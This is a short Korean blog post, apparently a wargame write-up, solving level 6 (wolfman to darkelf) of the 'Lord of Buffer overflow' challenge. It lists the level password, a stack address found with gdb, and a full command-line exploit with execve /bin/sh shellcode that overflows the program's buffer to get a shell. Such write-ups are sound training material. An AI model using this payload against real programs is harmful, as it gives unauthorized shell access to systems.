[LOB] 6번 wolfman -> darkelf

id : wolfman

password : love eyuna

로그인 후 darkelf.c 파일을 보면 다음과 같다

이번 문제는 저번처럼 풀면 될 것 같다

gdb로 argv[1]의 시작주소를 알아내면 된다

0xbffffc26 이다

./darkelf `python -c 'print "\x90"*15 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80" + "\x90"*4 + "\x26\xfc\xff\xbf"'`

NOP(15) + 쉘코드(25) + NOP(4) + argv[1] 주소(4)

쉘에서 my-pass를 입력하면 비밀번호를 알아낼 수 있다

'Wargame > Lord Of Buffer overflow' 카테고리의 다른 글

[LOB] 8번 orge -> troll (0)	2017.11.16
[LOB] 7번 darkelf -> orge (0)	2017.11.14
[LOB] 5번 orc -> wolfman (0)	2017.11.07
[LOB] 4번 goblin -> orc (0)	2017.11.07
[LOB] 3번 cobolt -> goblin (0)	2017.11.02

topaz

[LOB] 6번 wolfman -> darkelf

'Wargame > Lord Of Buffer overflow' 카테고리의 다른 글

티스토리툴바

[LOB] 6번 wolfman -> darkelf

'Wargame > Lord Of Buffer overflow' 카테고리의 다른 글

'Wargame/Lord Of Buffer overflow' Related Articles

티스토리툴바